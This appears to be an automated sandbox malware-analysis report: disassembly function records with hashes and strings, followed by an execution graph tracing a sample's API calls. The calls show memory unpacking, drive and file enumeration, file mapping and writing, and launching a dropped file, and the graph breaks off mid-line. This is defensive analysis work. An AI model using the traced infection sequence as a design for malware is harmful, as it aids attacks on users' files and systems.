                                    • Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy
                                    • String ID: at line $, column
                                    • API String ID: 4194217158-191570568
                                    • Opcode ID: 824742e2dcaf870e85df29ccf268a55b8d12f329736fe572c6d87b6e55ec406f
                                    • Instruction ID: 1d757808e15c859005bef5f1b2560c8b0f9fa88bc79c1b14c3ec2adad3d2d3e9
                                    • Opcode Fuzzy Hash: 824742e2dcaf870e85df29ccf268a55b8d12f329736fe572c6d87b6e55ec406f
                                    • Instruction Fuzzy Hash: 4B614B71A102049FDB09DF68CC89B9EBBB9FF44310F148219E419AB781EB74AA948791
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 002E3946
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 002E395F
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 002E3A97
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 002E3AB0
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 002E3C16
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 002E3C2F
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 002E4479
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 002E4492
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy
                                    • String ID: value
                                    • API String ID: 4194217158-494360628
                                    • Opcode ID: 912f599cc6744854234cec5ec65874d1634fbd7d82f738eda02550e43f3a1919
                                    • Instruction ID: d5b964e8867b9b779c07b45a5bbd1ac0c7e1d46fd3c97914624bd43e0b1c0b26
                                    • Opcode Fuzzy Hash: 912f599cc6744854234cec5ec65874d1634fbd7d82f738eda02550e43f3a1919
                                    • Instruction Fuzzy Hash: 7051D271C10288DBDF15DFA4CC89BDEBBB4BF05304F548259E449AB382D7786A98CB61
                                    APIs
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00273C0F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_copy
                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                    • API String ID: 2659868963-1866435925
                                    • Opcode ID: c38f2b036a8ea62f5debc9f18111af4741be5c6f23b376173ef902dd47679669
                                    • Instruction ID: aaee9de13e95809abba6b8cb4eb3e5e3b3dfaaffe968d154c86780f332757796
                                    • Opcode Fuzzy Hash: c38f2b036a8ea62f5debc9f18111af4741be5c6f23b376173ef902dd47679669
                                    • Instruction Fuzzy Hash: 461102B6920709ABC711DF69C801B9AB3E8EF05320F04C52AF95C9B241F774E914CB91
                                    Strings
                                    • unordered_map/set too long, xrefs: 002E2F43
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: unordered_map/set too long
                                    • API String ID: 0-306623848
                                    • Opcode ID: 04c8a0e73c228a976aee5635e981aea7d747d5deb986e2dcbe754e653168bc61
                                    • Instruction ID: 37567949704f79d6a6f128c273efc077e299bc1c94d0cba4675e362aaef8db8c
                                    • Opcode Fuzzy Hash: 04c8a0e73c228a976aee5635e981aea7d747d5deb986e2dcbe754e653168bc61
                                    • Instruction Fuzzy Hash: B8E1F471A10146CFCB19DF29C881A6DB7B9FF48310B64826AE81ADB391D730ED65CB90
                                    APIs
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 0027844D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_copy
                                    • String ID: parse error$ror
                                    • API String ID: 2659868963-4201802366
                                    • Opcode ID: ba0668ee099d43187eb87733fd2e4c12f6c254f746b00f9d5c4ddc708f29cf33
                                    • Instruction ID: 94cc3e356309cb1e06233c4dde36148cf4677b4c5a4bde03f828fd07bb4e9f6d
                                    • Opcode Fuzzy Hash: ba0668ee099d43187eb87733fd2e4c12f6c254f746b00f9d5c4ddc708f29cf33
                                    • Instruction Fuzzy Hash: 79C12831D20649CFDB09CF68CC99BADBB75BF45304F14C349E4086B692DBB4AA94CB91
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 00278051
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 00278060
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy
                                    • String ID: [json.exception.
                                    • API String ID: 4194217158-791563284
                                    • Opcode ID: b387772e151bd1bc3f1dac22f6b1b697506376397b3af76fa415b62b84828ba9
                                    • Instruction ID: c6ef52ec4c51fbe447e4108c4c0ad84a9eabd80af76e2205545fc239a80a2bd5
                                    • Opcode Fuzzy Hash: b387772e151bd1bc3f1dac22f6b1b697506376397b3af76fa415b62b84828ba9
                                    • Instruction Fuzzy Hash: 7D9129309202089FDB19CF68CC85BAEFBB5FF45314F14825DE404AB692D7B4A994CB91
                                    APIs
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00273C0F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_copy
                                    • String ID: ios_base::badbit set$ios_base::failbit set
                                    • API String ID: 2659868963-1240500531
                                    • Opcode ID: 2c8b935cb4791cfdea76477c3aeb4092fcb4c2a7b5839d91510df96408f157a5
                                    • Instruction ID: 68fffb43da0905709edda35844676c4aa794b32fdd01b239576f0506ceb024e3
                                    • Opcode Fuzzy Hash: 2c8b935cb4791cfdea76477c3aeb4092fcb4c2a7b5839d91510df96408f157a5
                                    • Instruction Fuzzy Hash: 7D411775920205ABC715DF68CC41BAEF7F8FF45310F14C21AF9189B681E774AA54CBA1
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 002E4E29
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 002E4E42
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 002E594D
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 002E5966
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy
                                    • String ID: value
                                    • API String ID: 4194217158-494360628
                                    • Opcode ID: 0e7cf3301dc00453ee5475df41707899da00405db0271b5420f966cb2aa72f00
                                    • Instruction ID: 24bb39f078ba9bb7fb98b7dc475a2ac1f77ee981e8b7049319ab8559d03b8b75
                                    • Opcode Fuzzy Hash: 0e7cf3301dc00453ee5475df41707899da00405db0271b5420f966cb2aa72f00
                                    • Instruction Fuzzy Hash: 8C51B170C20698DBDB15DFA4CC89BDEBBB4BF05304F144259E449AB382D7746A988B92
                                    APIs
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 002E99F1
                                    Strings
                                    • type must be boolean, but is , xrefs: 002E9AE2
                                    • type must be string, but is , xrefs: 002E9A58
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Concurrency::cancel_current_task
                                    • String ID: type must be boolean, but is $type must be string, but is
                                    • API String ID: 118556049-436076039
                                    • Opcode ID: 76c741dca43cc752c53da76f57d0d4defda75527d33f7561519d1b8086c8a8a1
                                    • Instruction ID: f3cb6cd776e8f2f09f4bbe12482f56e1c086ca2a14e74f25a91bf146094d566e
                                    • Opcode Fuzzy Hash: 76c741dca43cc752c53da76f57d0d4defda75527d33f7561519d1b8086c8a8a1
                                    • Instruction Fuzzy Hash: 5C316E75950248AFCB15EBA4D842BEEB7A8EF04300F50427AF419D77D2EB34AE54C792

                                    Execution Graph

                                    Execution Coverage:28.8%
                                    Dynamic/Decrypted Code Coverage:10.4%
                                    Signature Coverage:16.5%
                                    Total number of Nodes:297
                                    Total number of Limit Nodes:10
                                    execution_graph 1328 356014 1329 356035 GetModuleHandleA 1328->1329 1330 35605f 1328->1330 1331 35604d GetProcAddress 1329->1331 1332 356058 1331->1332 1332->1330 1332->1331 1332->1332 1011 356076 1012 35607b 1011->1012 1016 3560c7 1011->1016 1014 3560b0 VirtualAlloc 1012->1014 1012->1016 1023 3561b2 1012->1023 1013 35615f VirtualFree 1013->1016 1014->1016 1015 356198 VirtualFree 1015->1023 1016->1013 1016->1015 1017 3560d5 VirtualAlloc 1016->1017 1017->1016 1018 356389 VirtualProtect 1021 3563b7 1018->1021 1019 3563fc VirtualProtect 1020 356400 1019->1020 1021->1019 1022 3563e7 VirtualProtect 1021->1022 1022->1019 1022->1021 1023->1018 1024 3562fb 1023->1024 1025 3514e1 1026 351541 1025->1026 1027 3514fd GetModuleHandleA 1025->1027 1028 351573 1026->1028 1033 351549 1026->1033 1029 351512 1027->1029 1030 35151a VirtualQuery 1027->1030 1036 351638 GetTempPathA GetSystemDirectoryA GetModuleFileNameA 1028->1036 1029->1026 1030->1029 1031 351566 1033->1031 1053 351af9 1033->1053 1034 351579 ExitProcess 1037 35167f 1036->1037 1038 35167a 1036->1038 1059 351718 GetSystemTimeAsFileTime 1037->1059 1071 35139f GetVersionExA 1038->1071 1041 351686 1042 3516ca 1041->1042 1045 3516a0 CreateThread 1041->1045 1043 3516d7 1042->1043 1044 3516d0 1042->1044 1047 3516dd lstrcpy 1043->1047 1048 35170f 1043->1048 1092 351581 1044->1092 1064 352c48 memset 1045->1064 1308 351099 1045->1308 1047->1034 1048->1034 1052 351718 3 API calls 1052->1042 1054 351b11 1053->1054 1055 351b09 1053->1055 1057 351b16 CreateThread 1054->1057 1058 351b0f 1054->1058 1056 351638 188 API calls 1055->1056 1056->1058 1057->1058 1327 351638 189 API calls 1057->1327 1058->1031 1058->1058 1060 351735 SHSetValueA 1059->1060 1061 351754 1059->1061 1063 351786 __aulldiv 1060->1063 1062 35175a SHGetValueA 1061->1062 1061->1063 1062->1063 1063->1041 1098 351973 PathFileExistsA 1064->1098 1067 352cb2 1069 3516ba WaitForSingleObject 1067->1069 1070 352cbb VirtualFree 1067->1070 1068 352c8f CreateThread WaitForMultipleObjects 1068->1067 1120 352b8c memset GetLogicalDriveStringsA 1068->1120 1069->1052 1070->1069 1072 3513cf LookupPrivilegeValueA 1071->1072 1073 3514da 1071->1073 1074 3513e7 1072->1074 1075 3513ef 1072->1075 1073->1037 1288 35119f GetCurrentProcess OpenProcessToken 1074->1288 1075->1073 1293 35120e GetModuleHandleA GetProcAddress 1075->1293 1081 351448 GetCurrentProcessId 1081->1073 1082 351457 1081->1082 1082->1073 1083 351319 3 API calls 1082->1083 1084 35147f 1083->1084 1085 351319 3 API calls 1084->1085 1086 35148e 1085->1086 1086->1073 1087 351319 3 API calls 1086->1087 1088 3514b4 1087->1088 1089 351319 3 API calls 1088->1089 1090 3514c3 1089->1090 1091 351319 3 API calls 1090->1091 1091->1073 1307 35185b GetSystemTimeAsFileTime srand rand srand rand 1092->1307 1094 351592 wsprintfA wsprintfA lstrlen CreateFileA 1095 351633 1094->1095 1096 3515fb WriteFile CloseHandle 1094->1096 1095->1048 1096->1095 1097 35161d ShellExecuteA 1096->1097 1097->1095 1099 3519a0 1098->1099 1115 351ac7 1098->1115 1100 3519af CreateFileA 1099->1100 1101 3519c4 Sleep 1100->1101 1102 351a28 GetFileSize 1100->1102 1101->1100 1103 3519d5 1101->1103 1104 351a80 1102->1104 1105 351a38 1102->1105 1119 35185b GetSystemTimeAsFileTime srand rand srand rand 1103->1119 1106 351a96 1104->1106 1107 351a8d CloseHandle 1104->1107 1105->1104 1109 351a3d VirtualAlloc 1105->1109 1110 351aad 1106->1110 1111 351a9c DeleteFileA 1106->1111 1107->1106 1109->1104 1113 351a53 1109->1113 1110->1115 1118 351ab8 VirtualFree 1110->1118 1111->1110 1112 3519da wsprintfA CopyFileA 1112->1102 1116 351a0d CreateFileA 1112->1116 1113->1104 1117 351a59 ReadFile 1113->1117 1115->1067 1115->1068 1116->1102 1116->1111 1117->1104 1117->1113 1118->1115 1119->1112 1121 352c09 WaitForMultipleObjects 1120->1121 1122 352bc8 1120->1122 1123 352c3c 1121->1123 1124 352c2a CreateThread 1121->1124 1125 352bfa lstrlen 1122->1125 1126 352bd2 GetDriveTypeA 1122->1126 1127 352be3 CreateThread 1122->1127 1124->1123 1131 352845 1124->1131 1125->1121 1125->1122 1126->1122 1126->1125 1127->1125 1128 352b7d 1127->1128 1141 3529e2 memset wsprintfA 1128->1141 1278 35274a memset memset SHGetSpecialFolderPathA wsprintfA 1131->1278 1133 352853 1134 352878 DeleteFileA 1133->1134 1137 352692 8 API calls 1133->1137 1140 35239d 186 API calls 1133->1140 1135 35288c VirtualFree 1134->1135 1136 35289a 1134->1136 1135->1136 1138 3528a4 CloseHandle 1136->1138 1139 3528ab 1136->1139 1137->1133 1138->1139 1140->1133 1142 352abc memset memset FindFirstFileA 1141->1142 1143 352a3a memset lstrlen lstrcpyn strrchr 1141->1143 1155 3528b8 memset wsprintfA 1142->1155 1143->1142 1145 352a88 1143->1145 1145->1142 1147 352a9a lstrcmpiA 1145->1147 1149 352b74 1147->1149 1150 352aad lstrlen 1147->1150 1148 352b61 FindNextFileA 1151 352b6d FindClose 1148->1151 1152 352b23 1148->1152 1150->1142 1150->1147 1151->1149 1153 352b35 lstrcmpiA 1152->1153 1154 3528b8 174 API calls 1152->1154 1153->1151 1153->1152 1154->1148 1156 352905 1155->1156 1161 352951 memset 1155->1161 1157 352956 strrchr 1156->1157 1158 35291b memset wsprintfA 1156->1158 1156->1161 1160 352967 lstrcmpiA 1157->1160 1157->1161 1159 3529e2 180 API calls 1158->1159 1159->1161 1162 352988 lstrcmpiA 1160->1162 1163 35297a 1160->1163 1161->1148 1162->1161 1164 352994 1162->1164 1173 351e6e 1163->1173 1166 3529ad strstr 1164->1166 1167 3529a5 lstrcpy 1164->1167 1168 3529d3 1166->1168 1169 3529cb 1166->1169 1167->1166 1238 352692 1168->1238 1216 35239d strstr 1169->1216 1175 351e7d 1173->1175 1247 351df6 strrchr 1175->1247 1177 351eb0 SetFileAttributesA CreateFileA 1178 352332 1177->1178 1179 351edf 1177->1179 1181 352346 1178->1181 1182 35233d UnmapViewOfFile 1178->1182 1252 351915 1179->1252 1184 352350 1181->1184 1185 35234b FindCloseChangeNotification 1181->1185 1182->1181 1186 352356 CloseHandle 1184->1186 1187 352391 1184->1187 1185->1184 1186->1187 1187->1161 1188 351f2e 1188->1178 1258 351c81 1188->1258 1192 351f92 1193 351c81 2 API calls 1192->1193 1194 351f9f 1193->1194 1194->1178 1195 352024 1194->1195 1196 351af9 169 API calls 1194->1196 1195->1178 1197 351af9 169 API calls 1195->1197 1198 351fc0 1196->1198 1199 35207a 1197->1199 1198->1178 1198->1195 1201 351af9 169 API calls 1198->1201 1200 351af9 169 API calls 1199->1200 1204 352090 1200->1204 1202 351ffe 1201->1202 1203 352013 FlushViewOfFile 1202->1203 1203->1195 1205 3520bb memset memset 1204->1205 1206 3520f5 1205->1206 1207 351c81 2 API 